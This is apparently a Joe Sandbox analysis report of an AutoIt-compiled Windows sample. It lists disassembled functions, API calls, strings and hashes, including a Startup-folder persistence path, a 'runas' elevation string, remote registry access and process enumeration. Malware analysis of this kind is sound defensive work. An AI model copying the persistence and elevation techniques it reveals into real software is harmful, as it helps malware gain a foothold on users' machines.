                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                          • API String ID: 4253510256-2243176362
                                                                                                                                                          • Opcode ID: d429658b6ae94b0a66eeb3d20038a12579a6e102b1de3a62b8ddb94c0ac4320b
                                                                                                                                                          • Instruction ID: c107870065286305200cff500cdf224f67488c3609f6a2d5906c5fd56acbc97c
                                                                                                                                                          • Opcode Fuzzy Hash: d429658b6ae94b0a66eeb3d20038a12579a6e102b1de3a62b8ddb94c0ac4320b
                                                                                                                                                          • Instruction Fuzzy Hash: 87514970644294BBCF14ABF0FC86FED3B78AB26704F000166F7529A5A1D7744AD4DB22
                                                                                                                                                          Function 001229C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1173 1229c2-1229e2 1175 122a42-122a44 1173->1175 1176 1229e4-1229e7 1173->1176 1175->1176 1177 122a46 1175->1177 1178 122a48 1176->1178 1179 1229e9-1229f0 1176->1179 1182 122a2b-122a33 NtdllDefWindowProc_W 1177->1182 1183 122a4e-122a51 1178->1183 1184 192307-192335 call 12322e call 13ec33 1178->1184 1180 1229f6-1229fb 1179->1180 1181 122aac-122ab4 PostQuitMessage 1179->1181 1186 122a01-122a03 1180->1186 1187 19238f-1923a3 call 1657fb 1180->1187 1188 122a72-122a74 1181->1188 1189 122a39-122a3f 1182->1189 1190 122a53-122a54 1183->1190 1191 122a76-122a9d SetTimer RegisterClipboardFormatW 1183->1191 1217 19233a-192341 1184->1217 1193 122ab6-122ac0 call 121e58 1186->1193 1194 122a09-122a0e 1186->1194 1187->1188 1210 1923a9 1187->1210 1188->1189 1197 1922aa-1922ad 1190->1197 1198 122a5a-122a6d KillTimer call 122b94 call 122ac7 1190->1198 1191->1188 1195 122a9f-122aaa CreatePopupMenu 1191->1195 1211 122ac5 1193->1211 1200 122a14-122a19 1194->1200 1201 192374-19237b 1194->1201 1195->1188 1204 1922af-1922b1 1197->1204 1205 1922e3-192302 MoveWindow 1197->1205 1198->1188 1208 19235f-19236f call 165fdb 1200->1208 1209 122a1f-122a25 1200->1209 1201->1182 1215 192381-19238a call 15b31f 1201->1215 1212 1922b3-1922b6 1204->1212 1213 1922d2-1922de SetFocus 1204->1213 1205->1188 1208->1188 1209->1182 1209->1217 1210->1182 1211->1188 1212->1209 1218 1922bc-1922cd call 12322e 1212->1218 1213->1188 1215->1182 1217->1182 1222 192347-19235a call 122b94 call 123598 1217->1222 1218->1188 1222->1182
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00122A33
                                                                                                                                                          • KillTimer.USER32(?,00000001), ref: 00122A5D
                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00122A80
                                                                                                                                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00122A8B
                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00122A9F
                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00122AAE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                                          • String ID: TaskbarCreated
                                                                                                                                                          • API String ID: 157504867-2362178303
                                                                                                                                                          • Opcode ID: 70550873b091b1728f127c580b6d5be3529fcbca7571b8c1454c63b8b787dc1b
                                                                                                                                                          • Instruction ID: da5b1552bfe77717d596a113746ec35c402c925a9a7c5a2236ce49a646fc201a
                                                                                                                                                          • Opcode Fuzzy Hash: 70550873b091b1728f127c580b6d5be3529fcbca7571b8c1454c63b8b787dc1b
                                                                                                                                                          • Instruction Fuzzy Hash: FD41F5312106A9BBDB38AFA8BC49BBD3659F729340F040225F50797DA1DBB49DE08761
                                                                                                                                                          Function 001830AD Relevance: 12.4, APIs: 8, Instructions: 397registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1667 1830ad-18315b call 12ca8e call 12d3d2 * 3 call 1284a6 call 183d7b call 183af7 1682 18315d-183161 1667->1682 1683 183166-183170 1667->1683 1684 1831e6-1831f2 call 16d7e4 1682->1684 1685 1831a2 1683->1685 1686 183172-183187 RegConnectRegistryW 1683->1686 1696 183504-183527 call 125cd3 * 3 1684->1696 1690 1831a6-1831c3 RegOpenKeyExW 1685->1690 1688 183189-18319a call 127ba9 1686->1688 1689 18319c-1831a0 1686->1689 1688->1684 1689->1690 1691 1831c5-1831d7 call 127ba9 1690->1691 1692 1831f7-183227 call 1284a6 RegQueryValueExW 1690->1692 1702 1831d9 1691->1702 1703 1831e3-1831e4 1691->1703 1705 183229-183239 call 127ba9 1692->1705 1706 18323e-183254 call 127ba9 1692->1706 1702->1703 1703->1684 1716 1834df-1834e6 call 16d7e4 1705->1716 1713 18325a-18325f 1706->1713 1714 1834dc-1834dd 1706->1714 1717 18344c-183498 call 14010a call 1284a6 RegQueryValueExW 1713->1717 1718 183265-183268 1713->1718 1714->1716 1724 1834eb-1834fc 1716->1724 1741 18349a-1834a6 1717->1741 1742 1834b4-1834ce call 127ba9 call 16d7e4 1717->1742 1721 1833d9-183411 call 16ad14 call 1284a6 RegQueryValueExW 1718->1721 1722 18326e-183273 1718->1722 1721->1724 1748 183417-183447 call 127ba9 call 16d7e4 call 132570 1721->1748 1726 183279-18327c 1722->1726 1727 18338d-1833d4 call 1284a6 RegQueryValueExW call 132570 1722->1727 1724->1696 1735 1834fe 1724->1735 1731 1832de-18332b call 14010a call 1284a6 RegQueryValueExW 1726->1731 1732 18327e-183281 1726->1732 1727->1724 1731->1742 1758 183331-183348 1731->1758 1732->1714 1737 183287-1832d9 call 1284a6 RegQueryValueExW call 132570 1732->1737 1735->1696 1737->1724 1747 1834aa-1834b2 call 12ca8e 1741->1747 1764 1834d3-1834da call 14017e 1742->1764 1747->1764 1748->1724 1758->1747 1763 18334e-183355 1758->1763 1766 18335c-183361 1763->1766 1767 183357-183358 1763->1767 1764->1724 1770 183363-183367 1766->1770 1771 183376-18337b 1766->1771 1767->1766 1774 183369-18336d 1770->1774 1775 183371-183374 1770->1775 1771->1747 1776 183381-183388 1771->1776 1774->1775 1775->1770 1775->1771 1776->1747
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00183AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182AA6,?,?), ref: 00183B0E
                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0018317F
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0018321E
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001832B6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 658460102-0
                                                                                                                                                          • Opcode ID: 09e028a39df6f9d4e1dd662cd8fc63a19c8fab3c2655ea6b4486df787ef87e78
                                                                                                                                                          • Instruction ID: 8ddf63e95f71e168e7f9e5408529e112223198fd7ce635dbf64a9e396d5987fc
                                                                                                                                                          • Opcode Fuzzy Hash: 09e028a39df6f9d4e1dd662cd8fc63a19c8fab3c2655ea6b4486df787ef87e78
                                                                                                                                                          • Instruction Fuzzy Hash: 3AE16C71204210AFCB15EF28D995E2BBBE8EF89714B08856DF45ADB261DB30EE01CF51
                                                                                                                                                          Function 0013E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetVersionExW.KERNEL32(?,00000000), ref: 0013E4A7
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,001BDC28,?,?), ref: 0013E567
                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,001BDC28,?,?), ref: 0013E5BC
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013E5C7
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013E5DA
                                                                                                                                                          • GetSystemInfo.KERNEL32(?,001BDC28,?,?), ref: 0013E5E4
                                                                                                                                                          • GetSystemInfo.KERNEL32(?,001BDC28,?,?), ref: 0013E5F0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2717633055-0
                                                                                                                                                          • Opcode ID: 08b4119ef3f32581e24cbed166862f619dc8cbf5e5913eafb4ac209565695c76
                                                                                                                                                          • Instruction ID: 4652b86e1a175fc55d3dba1bb3880828481020aba91201e17aac2eb5e6b86e57
                                                                                                                                                          • Opcode Fuzzy Hash: 08b4119ef3f32581e24cbed166862f619dc8cbf5e5913eafb4ac209565695c76
                                                                                                                                                          • Instruction Fuzzy Hash: 9961E0B590A390DBCF15CF6898C11E97FA46F3A304F1A45D8D849AB287D734C948CF66
                                                                                                                                                          Function 001231F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00123202
                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00123219
                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 001957D7
                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 001957EC
                                                                                                                                                          • LockResource.KERNEL32(?), ref: 001957FF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                          • Opcode ID: 14ae0776be1793662d779d1127a02375028cd10c3258423fee44f0b1ee329275
                                                                                                                                                          • Instruction ID: 73539e9543abcb2eccfca91484fab7126331b470ebcd45f298f87e87f134a7e2
                                                                                                                                                          • Opcode Fuzzy Hash: 14ae0776be1793662d779d1127a02375028cd10c3258423fee44f0b1ee329275
                                                                                                                                                          • Instruction Fuzzy Hash: 4D117C75200B01BFE7218B65FC48F677BB9EBCAB41F108029F41296950DB71DD50CA70
                                                                                                                                                          Function 00166F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00166F7D
                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00166F8D
                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00166FAC
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00166FD0
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166FE3
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00167022
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1605983538-0
                                                                                                                                                          • Opcode ID: 288371fb0e877c3abe508ff403a4f5ec5aeefd744046b888e95fb9e79ec05f0f
                                                                                                                                                          • Instruction ID: 676aa0b77cdd578f1687737947e7076985137d91e1441d26653f118fcd6c2dce
                                                                                                                                                          • Opcode Fuzzy Hash: 288371fb0e877c3abe508ff403a4f5ec5aeefd744046b888e95fb9e79ec05f0f
                                                                                                                                                          • Instruction Fuzzy Hash: E6218771904218ABDB11EBA0DC88BEEB7BCAB59304F1004E9F545D3141E7759FD4CB60
                                                                                                                                                          Function 0016EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001678AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 001678CB
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0016F04D
                                                                                                                                                          • CoCreateInstance.COMBASE(001ADA7C,00000000,00000001,001AD8EC,?), ref: 0016F066
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0016F083
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                          • String ID: .lnk
                                                                                                                                                          • API String ID: 2126378814-24824748
                                                                                                                                                          • Opcode ID: 183e870371113429f3b5f4478f43fa36e7c78e6dbfbb2250b6ccca8495df855f
                                                                                                                                                          • Instruction ID: 71e417305b407c2db0be8b363e16c75038833c2fc4551409642f8de15d0c5037
                                                                                                                                                          • Opcode Fuzzy Hash: 183e870371113429f3b5f4478f43fa36e7c78e6dbfbb2250b6ccca8495df855f
                                                                                                                                                          • Instruction Fuzzy Hash: 3AA146756043019FC710EF14D894E5ABBE5BF89320F14895DF89A9B3A2CB31ED46CB91
                                                                                                                                                          Function 0013DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesW.KERNEL32(0012C848,0012C848), ref: 0013DDA2
                                                                                                                                                          • FindFirstFileW.KERNEL32(0012C848,?), ref: 00194A83
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$AttributesFindFirst
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4185537391-0
                                                                                                                                                          • Opcode ID: 7ea752aafe68efc43ff52c8c6a01e5cdce1bddae24483b0721db0c0ce9f52124
                                                                                                                                                          • Instruction ID: a2a5b7fadae13088d6639666f9f1b26d121938d313472c1700d121a965cd3f6d
                                                                                                                                                          • Opcode Fuzzy Hash: 7ea752aafe68efc43ff52c8c6a01e5cdce1bddae24483b0721db0c0ce9f52124
                                                                                                                                                          • Instruction Fuzzy Hash: D7E0D8314148015786186778FC0D8F9375C9B06338F100745F837C28E0EB709D8586D6
                                                                                                                                                          Function 0012DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6f2c8244d9398502ad2d6c1baf7fdec2d042526fcbea76d346ae1de3fdc98440
                                                                                                                                                          • Instruction ID: d7e7034059e46f272dd59bbe616891796f567cd5e4c8d3fc580b913b22eda254
                                                                                                                                                          • Opcode Fuzzy Hash: 6f2c8244d9398502ad2d6c1baf7fdec2d042526fcbea76d346ae1de3fdc98440
                                                                                                                                                          • Instruction Fuzzy Hash: F522B070A00229DFDB14DF58E490ABAF7F0FF19300F158069E9469B391E774ADA6CB91
                                                                                                                                                          Function 00133680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
